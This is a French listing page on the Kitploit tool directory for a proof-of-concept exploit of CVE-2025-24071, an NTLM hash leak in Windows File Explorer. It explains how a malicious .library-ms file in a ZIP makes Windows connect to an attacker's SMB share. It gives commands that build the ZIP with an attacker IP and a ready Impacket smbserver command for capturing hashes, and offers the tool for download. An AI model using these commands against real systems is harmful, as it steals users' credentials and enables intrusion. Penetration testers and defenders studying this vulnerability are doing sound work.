Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24071-POC — Preuve de concept pour CVE-2025-24071, générant un fichier ZIP malveillant qui déclenche la divulgation du hash NTLM via l'Explorateur Windows, utilisé avec un serveur SMB pour la capture d'identifiants. | Kitploit
Outils/GitHubGitHub/buffertrychar/cve-2025-24071-poc
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubbuffertrychar/cve-2025-24071-poc

CVE-2025-24071-POC

Preuve de concept pour CVE-2025-24071, générant un fichier ZIP malveillant qui déclenche la divulgation du hash NTLM via l'Explorateur Windows, utilisé avec un serveur SMB pour la capture d'identifiants.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24071 - Preuve de concept (PoC)

Description

Ce dépôt contient une preuve de concept (PoC) pour la CVE-2025-24071, une vulnérabilité de fuite de hachage NTLM dans l'Explorateur de fichiers Windows. Cette vulnérabilité permet à un attaquant de voler des hachages NTLM en exploitant la manière dont Windows gère les fichiers .library-ms malveillants.

Détails de la vulnérabilité

  • Identifiant CVE : CVE-2025-24071
  • Composant concerné : Explorateur de fichiers Windows
  • Type de vulnérabilité : Fuite de hachage NTLM
  • Impact : Un attaquant peut capturer les hachages NTLM d'un utilisateur cible sans aucune interaction de sa part

Comment ça fonctionne ?

  1. L'attaquant crée un fichier .library-ms malveillant contenant un chemin de partage SMB contrôlé par l'attaquant.
  2. Lorsque la cible télécharge et ouvre le dossier ZIP contenant le fichier malveillant, l'Explorateur de fichiers Windows traite automatiquement le fichier .library-ms.
  • Windows tente alors de se connecter au partage SMB de l'attaquant, envoyant le hachage NTLM de l'utilisateur dans le processus.
  • L'attaquant capture le hachage NTLM à l'aide d'un serveur SMB malveillant (par exemple, Impacket).
  • Fichiers inclus

    • CVE-2025-24071-POC.exe : Exécutable Windows qui génère le fichier ZIP malveillant
    • CVE-2025-24071-POC.py : Script Python équivalent pour les environnements Linux/macOS

    Utilisation

    Windows

    root@kitploit:~
    CVE-2025-24071-POC.exe -i <IP_attaquant> -n <nom>
    

    Linux/macOS

    root@kitploit:~
    python3 CVE-2025-24071-POC.py -i <IP_attaquant> -n <nom>
    

    Exemple

    root@kitploit:~
    CVE-2025-24071-POC.exe -i 10.10.14.8 -n try
    ZIP créé : try.zip
    

    Configuration du serveur SMB

    Pour capturer les hachages NTLM, vous devez configurer un serveur SMB à l'aide d'Impacket :

    root@kitploit:~
    smbserver.py try /root/smbshare -smb2support -ip 10.10.14.8 -debug
    

    Avertissement

    Cette preuve de concept est fournie à des fins éducatives et de test d'intrusion uniquement. N'utilisez cet outil que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite. L'utilisation abusive de cet outil peut entraîner des poursuites pénales.

    Références

    • Avis de sécurité Microsoft
    • Entrée NVD

    Licence

    Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

    Télécharger l’outil